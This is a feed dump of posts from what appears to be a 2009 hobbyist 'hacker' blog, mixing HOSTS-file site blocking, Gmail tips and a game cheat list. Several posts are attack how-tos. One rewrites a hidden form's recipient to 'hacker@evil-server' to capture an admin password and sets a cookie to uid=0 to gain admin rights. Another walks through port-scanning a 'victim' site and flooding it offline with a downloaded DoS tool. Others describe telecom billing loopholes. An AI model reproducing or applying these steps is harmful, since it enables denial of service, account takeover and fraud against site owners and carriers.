tag:blogger.com,1999:blog-22546634757436209102024-03-14T06:07:12.125-07:00hacker nepalhackernepal, hacking crackinghanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.comBlogger22125tag:blogger.com,1999:blog-2254663475743620910.post-86843853946943205662009-12-07T23:21:00.000-08:002009-12-07T23:24:52.266-08:00How to Block a Website?<ins style="border: medium none; display: inline-table; height: 250px; margin: 0pt; padding: 0pt; position: relative; visibility: visible; width: 300px;"><ins style="border: medium none; display: block; height: 250px; margin: 0pt; padding: 0pt; position: relative; visibility: visible; width: 300px;"><iframe allowtransparency="true" frameborder="0" height="250" hspace="0" id="google_ads_frame2" marginheight="0" marginwidth="0" name="google_ads_frame" scrolling="no" src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3696876220666555&output=html&h=250&slotname=6147280679&w=300&lmt=1260030888&host=pub-1556223355139109&flash=10.0.32&url=http%3A%2F%2Fwww.blogspotter.co.cc%2F2009%2F09%2Fhow-to-block-website.html&dt=1260256640479&prev_slotnames=4555030141&correlator=1260256640419&frm=0&ga_vid=630319401.1260256640&ga_sid=1260256640&ga_hid=645638527&ga_fc=0&u_tz=-480&u_his=1&u_java=0&u_h=900&u_w=1440&u_ah=860&u_aw=1237&u_cd=32&u_nplug=7&u_nmime=9&biw=1237&bih=613&ref=http%3A%2F%2Fwww.blogspotter.co.cc%2F2009_09_01_archive.html&fu=0&ifi=2&dtd=9&xpc=wKTke05tEt&p=http%3A//www.blogspotter.co.cc" style="left: 0pt; position: absolute; top: 0pt;" vspace="0" width="300"></iframe><br />
</ins><br />
</ins><br />
Some times it becomes necessary to block a website on our Computers for one or other reason.You can easily and effectivily block access to a website by adding it to your Windows HOSTS file.Once the website is blocked in the HOSTS file,it will not appear in any of the browsers.That is,the website becomes completely unavailable.<br />
<br />
<br />
1.Go to your HOSTS file which is located at:<br />
C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP<br />
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000<br />
C:\WINDOWS for Windows 98 and ME<br />
2. Open HOSTS with Notepad.<br />
The default Windows HOSTS looks like this:<br />
______________________<br />
# Copyright © 1993-1999 Microsoft Corp.<br />
#<br />
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.<br />
#<br />
# This file contains the mappings of IP addresses to host names. Each<br />
# entry should be kept on an individual line. The IP address should<br />
# be placed in the first column followed by the corresponding host name.<br />
# The IP address and the host name should be separated by at least one<br />
# space.<br />
#<br />
# Additionally, comments (such as these) may be inserted on individual<br />
# lines or following the machine name denoted by a “#” symbol.<br />
#<br />
# For example:<br />
#<br />
# 102.54.94.97 rhino.acme.com # source server<br />
# 38.25.63.10 x.acme.com # x client host<br />
#<br />
127.0.0.1 localhost<br />
_____________________________<br />
3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:<br />
127.0.0.1 name of the URL you want to block<br />
For example to block the website MySpace.com, simply type:<br />
127.0.0.1 myspace.com<br />
127.0.0.1 www.myspace.com<br />
Other parts of MySpace could be blocked in a similar way:<br />
127.0.0.1 search.myspace.com<br />
127.0.0.1 profile.myspace.com<br />
etc etc etc…<br />
It is necessary to add a website with and without the “www.”. You can add any number of websites to this list.<br />
4. Close Notepad and answer “Yes” when prompted.<br />
5. After blocking the website, test it in any of the browser.If every thing is done as said above,the website must not appear in any of the web browsers. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”.<br />
<br />
Some people suggest that your add a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookies.<div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-37097663787756419812009-12-07T23:14:00.001-08:002009-12-07T23:25:10.492-08:00javascript injection attackJavascript injections are simple to find and exploit. They’re used for editing client side data, mainly html forms and cookies. The only two commands that are of any use are <b>void</b> and <b>alert</b>. Alert is really simple understand just by looking at the pop up. Void is quite different, it’s used to modify forms or cookies.<br />
Form editing:<br />
Now it’s really simple to edit some form variables to change fiend names of even values. Lets imagine a page that sends the admin his password every time he clicks on a button:<br />
<br />
<code><br />
</code><br />
input name="email" value="admin@some-rand-host.com" type="hidden"<br />
input name="submit" value="Send Mail" type="submit"<br />
<br />
Now we can see that in this cut of code that the main idea is to send an email to the hard coded address in the page (admin@some-rand-host). This is where javascript comes in handy to change the target email address:<br />
This should be written directly into the url bar:<br />
<code><br />
javascript:void(document.forms[0].email.value="hacker@evil-server")<br />
</code><br />
Then we run the code by charging the url, then to view the results all you have to do is refresh the page.<br />
Now read understanding the line:<br />
first running the command : <code>javascript:void()</code><br />
then we define the variable we want to change: <code>document.forms[0].email.value</code>.<br />
This means that we want to modify one of the forms inside the document, actually the form number 0. If it was the second form in then page then we would use: <code>document.forms[1].email.value</code>. Next we precise the name of the input control we want to modify followed by the field: … <code>email.value</code>.<br />
So there you have it, you change the address of the recipient to your own for example then send a mail <img alt=";)" class="wp-smiley" src="http://www.apollonews.com/wp/wp-includes/images/smilies/icon_wink.gif" /> <br />
Cookie editing:<br />
Cookies are used to keep simple variables and values on a client machine inside temporary internet files, cookies. These cookies could be used for example to keep track of your connection status, current theme, or in the worst cases: your user rights. It’s probably the simplest way but also the most unsure and dangerous for the webmaster, use cookies to keep track of the user rights. To see the cookies that a site serves us we can use the alert command again: <code>javascript:alert(document.cookie)</code> From there we can see if there are any vulnerable fields that we might be able to inject and control. Imagine a cookie like this one:<br />
<code><br />
use_theme=darkblue;user_name=hackr;uid=2;<br />
</code><br />
Now you can see that the cookie actually holds onto the variable “rights” which means that we can easily try to change it’s value and check out the results by running a command like this one:<br />
<script type="text/javascript">
<!-- google_ad_client = "pub-3696876220666555"; /* 300x250, created 8/15/08 */ google_ad_slot = "0402648717"; google_ad_width = 300; google_ad_height = 250; //-->
</script><br />
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script><script>
google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);
</script><br />
<br />
<div class="quoteview"><code>javascript:void(document.cookie="uid=0")</code><br />
</div><br />
With that line we just changed the value of uid from 2 to 1 which means that if the website treats uid 0 users as administrators then we are now admins <img alt=";)" class="wp-smiley" src="http://www.apollonews.com/wp/wp-includes/images/smilies/icon_wink.gif" /> Thankfully this is a vulnerability based on trusting users that’s being found less and less in the wild.<br />
<br />
<br />
<ol><li>Try these injections:<br />
<br />
<br />
<ul><li>javascript:alert("Hello!"); <br />
<ul><li>This will bring up an alert box saying "Hello!"</li>
</ul><br />
</li>
<li>javascript:alert("Hello"); alert("World"); <br />
<ul><li>This will bring up 2 alert boxes. The one in the front will say "Hello" and once you click OK, the one saying "World" will appear.</li>
</ul><br />
</li>
<li>javascript:alert(document.forms[0].to.value="something") <br />
<ul><li>This will change the value of form [0] to something.</li>
</ul><br />
</li>
<li>javascript:void(document.bgColor="blue") <br />
<ul><li>This will change the background color to blue. You can put any other color in the place of blue to change it to a different color.</li>
</ul><br />
</li>
<li>javascript:alert("The actual url is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof."); <br />
<ul><li>This long injection will tell you the real server name of the site you are looking at. You should use it if you think that you are viewing a spoofed website. Or anytime just to make sure.</li>
</ul><br />
</li>
<li>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0); <br />
<ul><li>This long injection will make pictures fly around. Make sure to find a site like Google Images so there are more pictures!(If you press the refresh button, it goes really fast! might only work with MAC)</li>
</ul><br />
</li>
</ul><br />
</li>
<li>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.cos(R*x1+i*x1+x2)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);</li>
<li>Note that this is an alternate to the spinning circle of pictures. It funnels the pictures in a snake-like motion.<br />
<br />
<br />
<ul><li>javascript:document.body.contentEditable='true';document.designMode='on';void0</li>
</ul><br />
</li>
<li>Note that this injection allows you to move things around on the webpage. However, any changes you make here are not permanent, and can only be seen by you.</li>
</ol><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-1392804875942209572009-12-07T23:06:00.001-08:002009-12-07T23:25:22.889-08:00Hack nepal telecom phoneOnce again another trick have been found for NTC. You can call it whatever tips, tricks, tweaks, HACK or loophole since this feature has not been officially launched yet. The system I am talking about is Voice mail system for GSM Pre-paid users of NT. This will allow you to send receive voice message to specified phone (the receiver and sender both must have activated voice mail system in order to exchange voice messages).<br />
And the thing which makes it special is that it's FREE, totally free. NTC doesn't charge any fees for sending and receiving voice message. This feature may come handy when you don't have any balance to call or SMS.<br />
<blockquote>Nepal Telecom has been providing Voice Mail Box service since the beginning of Mobile Service in Nepal. Voice Mail Service allows the user to be always in touch. In order to use the voice mail service, user must have <b>CALL FORWARDING</b> facility. If the user wants his/her incoming calls to be diverted to the Voice Mail server on different conditions (like unconditionally, on busy, no reply or out of reach for postpaid and unconditionally only for prepaid subscriber ), he/she must set the call forward number as <b>011614</b> in the user's mobile set. When the call forward service to the voice mail is activated, the incoming calls will be diverted to the voice mail box according to the conditions specified by the user. The calling party can leave the voice message in the mail box of the called party. Once the message is recorded in the mail box, the user will be notified about the new message through Short Message Service (SMS).<br />
<br />
The user can then dial his voice mail box and check the new or old messages and manage mail box by dialing the Voice Mail number <b>011616</b>. It should be noted that the user has to use own mobile SIM to access the voice mail service by this method. Once the user is connected to the voice mail server, the system will guide the user for different options in the service through interactive voice prompts. Users have to listen carefully to the guidelines provided by the system for familiarizing themselves to the service.<br />
<ol type="1"><li><b>Voice Mail Subscription Charge :</b> None<br />
<br />
</li>
<li><b>Message Deposit Charge :</b> When the Incoming Calls are transferred to Voice Mail Box, the message duration will be charged as the air time charge of the outgoing mobile calls.<br />
<br />
</li>
<li><b>Message Retrieval Charge :</b> There will be no extra charge for the retrieving the messages from the voice mail box.<br />
<br />
</li>
<li><b>Mail Box Management Charge :</b> No additional charge for Mail Box management (Active/Inactive)<br />
</li>
</ol>VMS Number for call deposit : <b>011614</b><br />
VMS Number for call retrieval : <b>011616</b><br />
<br />
<b>Additional services available now:</b><br />
<ol type="1"><li><b>Miss call notification -</b> some one dials a mobile number, if in case the call has been diverted to voice mail and the caller disconnect the call before the message deposit tone is heard, then the called number will be miss call information via sms.<br />
<br />
</li>
<li><b>Heard Message Notification -</b> A caller deposits a voice message. After the called party listens to the deposited message, the depositor (caller) will get sms confirming that his message has been heard by the called party.</li>
</ol><br />
- <span style="font-style: italic;">Nepal Telecom</span><br />
</blockquote>Dialing <span style="font-weight: bold;">011614 </span>to send voice message costs you air time charge.<br />
To <span style="font-weight: bold;">ACTIVATE VOICE MAIL SERVICE</span> you'll have to follow the instructions below.<br />
<ol><li>Dial the code in bold letters in your<span style="font-weight: bold;"> </span><span style="color: #cc0000; font-weight: bold;">phone</span>, <span style="font-weight: bold;">*21*011614#</span> (This will send a service command to service provider and a message pops out with, <span style="font-weight: bold;">Call Diverted</span> or some thing similar to this. Never mind as you've dialed the number any message will be OK :) )</li>
<li>Now you'll see a call divert icon in your normal stand by screen, the icon resembles the curved or turning arrow.</li>
<li>Now check if the call divert works or not by calling to your own number.</li>
<li>You'll be weclomed to <span style="font-weight: bold;">Voice mail service </span><span>after the notification of call diversion.</span><span><br />
</span></li>
<li>Then you can Hangup.</li>
<li>OK now get back to the phone where you have activated call divert option. Again in the stand by screen dial <span style="font-weight: bold;">#21#</span> . This will disable the call divert option and the call divert logo will disappear from your screen. <span style="font-style: italic;">Not every phone model shows call diver logo.</span></li>
</ol><br />
Congratulations, you've successfully activated the voice mail system from NTC.<br />
You may ask, "where is the hack?" Here it is..<br />
NTC claims the VMS Number for call deposit : <b>011614 </b>, and dialing this number costs you airtime charge. So what you must do while sending voice message is follow the steps below, to <span style="font-weight: bold;">SEND VOICE MAIL </span>to another Voice mail service activated number)<br />
<ol><li>Put the following initial number while dialing any Voice mail service activated number, <span style="font-weight: bold;">011616</span><span style="color: #006600; font-weight: bold;">984XXXXXXX </span><span style="color: black;">i.e. 011616[YOUR NUMBER]</span></li>
<li><span style="color: black;">Then follow the system guidlines.</span></li>
</ol>If you followed the steps above you won't get any charges for sending and receiving voice mails.<br />
<br />
To <span style="font-weight: bold;">CHECK YOUR VOICE MAIL (INBOX)<br />
</span><ol><li>To check if you have voice mail or not, dial this number <span style="font-weight: bold;">011616, </span>then follow the instructions by the robot.</li>
</ol>This is totally free you won't get any amount charged for the exchange of message. You can record your message up to 60 Seconds. It can be useful to one who wants to hear voice instead of message.<br />
I found this service pretty helpful. If you are not able to activate this system then don't hesitate to contact us. Enjoy Voice messaging ;)<br />
<br />
<span style="font-weight: bold;">UPDATE:</span> This loophole is now removed by NTC. It no more works.<div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-82413556265725854782009-12-07T23:05:00.000-08:002009-12-07T23:25:35.030-08:00How to make unlimited free call using Yahoo messengerI was exploring through some technology blogs. And I came across this blog, <a href="http://itstechsense.blogspot.com/">Techsense</a>, where I found this really useful trick. I cannot guarantee you that this trick will work, but he claims that it works.<br />
<br />
First you should be having yahoo messenger installed in your computer as most generally all<br />
have it but in case if you dont have you can download it <a href="http://rd.software.yahoo.com/msgr/9/msgr9us.exe">HERE</a><br />
<br />
Sign up in your yahoo messenger as you usually do. There you'll see a box right on the top of the yahoo messenger containing some text (see in the snapshot below).<br />
<br />
<span style="font-size: 180%;"></span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlTpEyWVdiK_XTx8pypz2Qj8r9-51f_bN06huot2I2GWx35xby8rxdpzTapJCmTWBwOxt2DefAcVrlZi-nOSZpeWhSM9CeybocQXOi6a5wTtMts91hDAu6Is8h7Rkq19b_ILW5ORXHACI/s1600-h/ScreenShot0261.bmp" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" style="clear: left; float: left; font-weight: bold; margin-bottom: 1em; margin-right: 1em;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5369075258366069234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlTpEyWVdiK_XTx8pypz2Qj8r9-51f_bN06huot2I2GWx35xby8rxdpzTapJCmTWBwOxt2DefAcVrlZi-nOSZpeWhSM9CeybocQXOi6a5wTtMts91hDAu6Is8h7Rkq19b_ILW5ORXHACI/s400/ScreenShot0261.bmp" style="float: left; height: 300px; margin: 0pt 10px 10px 0pt; width: 400px;" /></a><span style="font-size: 180%;"><br />
<span style="font-size: 130%;"><span style="font-size: 100%;"></span><span style="font-size: 100%;"><br />
<span style="font-size: 100%;"><span style="font-weight: bold;"></span></span></span></span></span><span style="font-size: 100%;"></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Fill the numbers given below in that field.<br />
<br />
<br />
<blockquote><span style="font-size: 180%;">+18003733411</span></blockquote>When you make call to this number an operator will respond to you saying <i>main menu. </i>As soon as you hear get this response, reply them saying<i> free call.</i><br />
<br />
After few moment when you hear a beep tone, a dial pad will popup in your computer screen where you'll have to dial the destination number including the country and area code. You have talk time up to 5 minutes using this method.<i> </i>But again starting over from the above steps, you can make unlimited calls everyday.<div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com1tag:blogger.com,1999:blog-2254663475743620910.post-82409232572602462632009-12-07T23:03:00.001-08:002009-12-07T23:25:41.276-08:00crashing website using IPYour friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it<br />
<br />
TOOLS:<br />
<a href="http://www.mediafire.com/?sharekey=7fcc5e5c82ff2dcbe62ea590dc5e5dbbe04e75f6e8ebb871">Port Scanner</a> <br />
<br />
<div><div><div><a href="http://www.mediafire.com/?sharekey=7fcc5e5c82ff2dcbe62ea590dc5e5dbbe04e75f6e8ebb871">rDos</a></div><div><a href="http://hotspotshield.com/">HotSpotSheild Proxy!</a></div><br />
<br />
<div>Step One: First we need to find the websites IP Adress. This is very easy todo. Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s) </div><img alt="" border="0" src="http://i27.tinypic.com/23u67h1.jpg" style="display: block; height: 291px; margin: 0px auto 10px; text-align: center; width: 603px;" /><br />
Step Two: Now we must test to see if port 80 is open (it usually is).<br />
<br />
This is very easy todo to Ok open up the port scanner you downloaded.<br />
Once in the port scanner type in your Victims ip that you got from step 1.<br />
It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.<br />
[X] = Closed<br />
[X] Vulnerable = Open<br />
<img alt="" border="0" src="http://i25.tinypic.com/2w68nys.jpg" style="display: block; height: 245px; margin: 0px auto 10px; text-align: center; width: 584px;" /><br />
Step Three ALMOST DONE:<br />
<br />
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)<br />
If port 80 is open your on your way to crashing!!<br />
<br />
Ok open Up rDos that you download.<br />
Enter your victims ip that we got from step 1.<br />
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.<br />
Hit enter.. *=Flooding -=Crashed Or didn't connect!<br />
EXAMPLE: <img alt="" border="0" src="http://i28.tinypic.com/bhzlp0.jpg" style="display: block; height: 292px; margin: 0px auto 10px; text-align: center; width: 578px;" /><br />
Thanks for reading i hope this helps :) </div></div><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-29401252335190304042009-12-07T22:39:00.000-08:002009-12-07T23:25:54.340-08:00new gmail hacking trick<span style="font-size: small;">It is interesting work to hack gmail and to know more about it's special features. Gmail beats all other email providers with its endless customization capabilities, Google product integration and fantastic spam filter. And today I am sharing you a very useful tricks, tips and cool hack for gmail. </span><span style="font-family: inherit; font-size: small;">Take it to the next level with these Gmail power user tips and Greasemonkey extensions for Firefox. May this tricks and tips helps you to make you perfect g-mailer:)</span><br />
<br />
<div align="center"><div style="font-family: inherit; text-align: left;"><span style="font-family: inherit; font-size: small;"> <br />
</span><br />
</div><div style="font-family: inherit; text-align: left;"><span style="font-size: small;"><b>1. Master the Gmail keyboard shortcuts</b></span><br />
</div><div style="font-family: inherit; text-align: left;"><span style="font-family: inherit; font-size: small;">If you haven’t already, master the shortcut keys. Compose, mark as read, archive and much more with the press of a button. Sure, you know <b>c</b> for <b>compose</b> and <b>!</b> for <b>report spam</b>, but do you know <b>g + t</b> for the <b>sent mail folder</b>? </span><br />
</div></div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;">You can find a complete list at the official <a href="http://mail.google.com/support/bin/answer.py?answer=6594">Gmail shortcut page</a>.</span><br />
</div><div style="text-align: left;"><br />
</div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"><b>2. Resize your gmail compose box</b></span><br />
</div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"><b> </b></span><span style="font-family: inherit; font-size: small;">The aptly-named <a href="https://addons.mozilla.org/en-US/firefox/addon/3818">Resizeable Textarea</a> Firefox extension allows you to click and drag the edge of your compose box without resizing your browser window. Note that any browser built with the newest Opensource.org webkit—Safari, for example—will already have this capability. For more browser info, check out the <a href="http://botw.org/top/Computers/Software/Internet/">internet software</a> category.</span><span style="font-size: small;"><br style="font-family: inherit;" /></span><br />
<span style="font-size: small;"><img src="http://farm3.static.flickr.com/2374/2293999091_aa1d021d60.jpg?v=0" /></span><br />
<br />
</div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"><b>3. View unread messages first</b></span><br />
</div><div style="text-align: left;"> <span style="font-size: small;">Search on the string “label:unread label:inbox” to force all of your unread messages to the top of the list, <a href="http://www.mattcutts.com/blog/9-power-tips-for-gmail/">writes</a> Matt Cutts. (Note: you don’t have to create any labels for this to work.) Try bookmarking Cutts’s search and dragging it to your bookmarks bar to view all unread messages first.</span><br />
<div style="font-family: inherit;"><span style="font-size: small;"><br />
</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><b>4. Quickly switch between Google accounts</b></span> <br />
</div><span style="font-family: inherit; font-size: small;">If you have multiple Google accounts—a Gmail with Google Apps account and a regular Gmail account, for example—streamline them with <a href="http://userscripts.org/scripts/show/16341">this script</a> for Firefox with Greasemonkey. The script adds a “change user” drop-down bar in place of the “sign out” link.</span><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><br style="font-family: inherit;" /> <br />
<img src="http://farm3.static.flickr.com/2146/2293999199_bff2fb3d65.jpg?v=0" /><br style="font-family: inherit;" /> </span><span style="font-family: inherit; font-size: small;">You can also try <a href="https://addons.mozilla.org/en-US/firefox/addon/1320">Gmail Manager</a> (also a Firefox extension), which adds a Gmail menu bar to the Firefox window. Juggle multiple accounts, sign in and out.<br />
</span><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><br />
<img src="http://farm4.static.flickr.com/3138/2294788610_f989aba00e.jpg?v=0" /> </span><br />
<div style="font-family: inherit;"><span style="font-size: small;"><br />
</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><b>5. Gmail Notifier for Windows / Google Notifier for Mac</b></span><br />
</div><div style="font-family: inherit;"> <span style="font-family: inherit; font-size: small;">Rather than keeping a browser window open and hitting CTRL-R like you've got OCD, install a widget like <a href="http://mail.google.com/support/bin/answer.py?answer=9429&topic=13383">Gmail Notifier for Windows</a> or <a href="http://toolbar.google.com/gmail-helper/notifier_mac.html">Google Notifier for Macs</a>. It'll check your email (and Google Calendar, if you're a Mac user) as compulsively as you do. And as with almost everything else under the sun, there's a <a href="https://addons.mozilla.org/en-US/firefox/addon/173/">Firefox extension</a> that will serve the same function (it's not released by Google).</span><br />
</div><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><br />
<img height="230" src="http://farm4.static.flickr.com/3166/2293999429_8b7e6404ee.jpg?v=0" width="384" /><br />
<br />
</span><br />
<span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><img src="http://farm3.static.flickr.com/2024/2293999485_6d894d4dbf.jpg?v=0" /></span><br />
<div style="font-family: inherit;"><span style="font-size: small;"><b>6. Use Gmail like an external hard drive</b></span> <br />
</div><span style="font-family: inherit; font-size: small;">Use up any vegetating space in your Gmail account with this <a href="http://www.softpedia.com/get/Internet/E-mail/Mail-Utilities/GMail-Drive-shell-extension.shtml">Windows drive shell extension</a>. Your Gmail space appears in My Computer/Windows Explorer as an external drive, and when you drag and drop a file to the drive, it sends an email to your Gmail account with the file as an attachment. Note that this is a fairly old program but seems to have been updated for the latest Gmail version. Mac users can try <a href="http://lifehacker.com/software/top/download-of-the-day--gdisk-130689.php">gDisk</a> and Linux users can check out <a href="http://richard.jones.name/google-hacks/gmail-filesystem/gmail-filesystem.html">GmailFS</a>.</span><span style="font-family: Arial,Helvetica,sans-serif; font-size: small;"><br />
<br />
<img src="http://farm3.static.flickr.com/2304/2294789104_9a61bc4a93.jpg?v=0" /> </span><br />
<div style="font-family: inherit;"><span style="font-size: small;"> </span><br />
</div></div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"><b>7. Hack Gmail’s CSS</b></span><br />
</div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"><b> </b></span><span style="font-family: inherit; font-size: small;"> “Stylish is to CSS what Greasemonkey is to JavaScript,” says the Firefox extension page for <a href="https://addons.mozilla.org/en-US/firefox/addon/2108">Stylish</a>. Cascade those style sheets yourself, or grab them from <a href="https://addons.mozilla.org/en-US/firefox/addon/2108">userstyles.org</a>. For more web design tips and tricks, check out these <a href="http://botw.org/top/Computers/Internet/Web_Design_and_Development/">web design and development</a> resources.</span><br />
</div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"> <br />
</span><br />
</div><div style="text-align: left;"><span style="font-family: inherit; font-size: small;"><b>8. Backup your Gmail</b></span><br />
</div> <span style="font-size: small;">If you’re using a desktop or smartphone mail client, you’ve already got some backups of your email. But what if you’re all web-based? What if Gmail servers were hit by a nuclear bomb? Stop the paranoia and check the Gmail backup tutorial <a href="http://www.googletutor.com/2007/03/29/using-google-groups-to-backup-gmail/">here</a> and the Google Apps backup tips <a href="http://lifehacker.com/software/hack-attack/back-up-your-google-apps-data-281635.php">here</a>.</span><br />
<div style="font-family: inherit;"><span style="font-size: small;"><br />
</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><b>9. Include or exclude Chat from search results</b></span> <br />
</div><div style="font-family: inherit;"><span style="font-size: small;">Chat conversations are automatically filed like emails with a Chat label, so to exclude Chat when searching, use the string -label:Chat. Conversely, to search only Chat conversations, use the string +label:Chat. The –label: and +label: syntax will work to exclude or include any label in Gmail search results. Another <a href="http://g04.com/misc/GmailTipsComplete.html#Tip-55">Jim Barr tip</a>.</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><br />
</span><br />
</div><div style="font-family: inherit;"><span style="font-family: inherit; font-size: small;"><b>10. Google Desktop Plug-In for Google Notifier</b></span><span style="font-size: small;"> </span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;">Some users have reported compatibility issues between Google Toolbar, Google Apps and Google Desktop. Everyone's configuration is different, blah blah blah, so it's impossible to know, but Maxim Alexeyev created this <a href="http://malexeyev.googlepages.com/gmailnotifier">Google Desktop Plug-In</a> which purports to replace Google Notifier for Google Desktop and Google Toolbar users. The plug-in also offers multi-username functions and Google Apps support.</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><br />
</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><b>11. Read your Google Reader RSS feeds in Gmail</b></span><br />
</div><div style="font-family: inherit;"> <span style="font-family: inherit; font-size: small;">Treat your Google Reader RSS feeds the same way you treat old friends with this <a href="http://userscripts.org/scripts/show/14030">Greasemonkey + Firefox script</a>. Feeds invading your Gmail will offer more-efficient time-wasting than ever before. Note that Google Reader and Gmail seem to be moving closer together in functionality and interface and it's likely that they'll soon be officially integrated.</span><br />
</div><div style="font-family: inherit;"><br />
</div><div style="font-family: inherit;">12. Create a podcast of your Gmail<br />
</div><span style="font-size: small;"><b></b></span><div style="font-family: inherit;"><span style="font-size: small;">Without an iPhone or Blackberry, the morning subway ride can get pretty boring. And you can’t navigate a smartphone while driving—or at least, you shouldn’t. Create an RSS feed from your Gmail account with this syntax:<br />
<b>https://username:password@gmail.google.com/gmail/feed/atom</b><br />
Then sign for a <a href="http://www.feedburner.com/fb/a/home">FeedBurner</a> account to host and distribute it. Use a RSS to podcast site like <a href="http://www.audiodizer.com/">AudioDizer.com</a> or one of the many options at <a href="http://www.nextup.com/">NextUp</a> to create text-to-speech files. Voila! This hack is based on a tip from <a href="http://www.mikedonaghy.org/post/podcast-your-gmail">Mike Donaghy</a>. For even more, check out these <a href="http://botw.org/top/Computers/Internet/WWW/Podcasts/">podcast</a> resources.</span><br />
</div><div style="font-family: inherit;"><span style="font-size: small;"><br />
</span><br />
</div><span style="font-size: small;">The above tricks and trick of gmail are also included from other sites, and some of are my own tricks :) Hope you will learn these tricks. You can share your own tricks, tips or hack for gmail without any difficulty. Happy Hacking!</span><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com1tag:blogger.com,1999:blog-2254663475743620910.post-34865452942206797612009-10-20T09:15:00.001-07:002009-12-07T23:26:03.343-08:00downlado cheat box<span style="border-collapse: collapse;"></span><br />
<table border="0" cellspacing="1" id="table8" style="width: 628px;"><tbody>
<tr><td width="596"><span style="font-family: Verdana; font-size: x-small;">CheatBook is cheat code tracker with cheats, Tips, Tricks and hints for popular Games. </span><br />
</td></tr>
<tr><td bgcolor="#ffcc00" width="596"> <b><span style="color: black;">PC Cheat Codes</span></b><br />
</td></tr>
<tr><td width="596">101 - The Airborn Invasion of Normandy<br />
1503 A.D. - The New World<br />
18 Wheels Of Steel - American Long Haul<br />
18 Wheels of Steel - Haulin<br />
18 Wheels of Steel - Pedal to the Metal<br />
2025 - Battle for Fatherland<br />
2029 Online<br />
3D Movie Maker<br />
3D Pinball - Space Cadet<br />
A Bark in the Dark<br />
A Reckless Disregard For Gravity<br />
Abomination<br />
Ace of Spades<br />
Adventure Chronicles - The Search for Lost Treasure<br />
Adventure Quest<br />
Adventure Quest 2<br />
Adventure Quest Worlds<br />
Age Of Empires 3 - Asian Dynasties<br />
Age of Mythology<br />
Age of War<br />
Aion - Tower of Eternity<br />
Anno 1503<br />
Ashes Cricket 2009<br />
Avatar - The Game<br />
Backyard Football 2004<br />
Batman - Arkham Asylum<br />
Batman - Vengeance<br />
Battle Realms - Winter Of The Wolf<br />
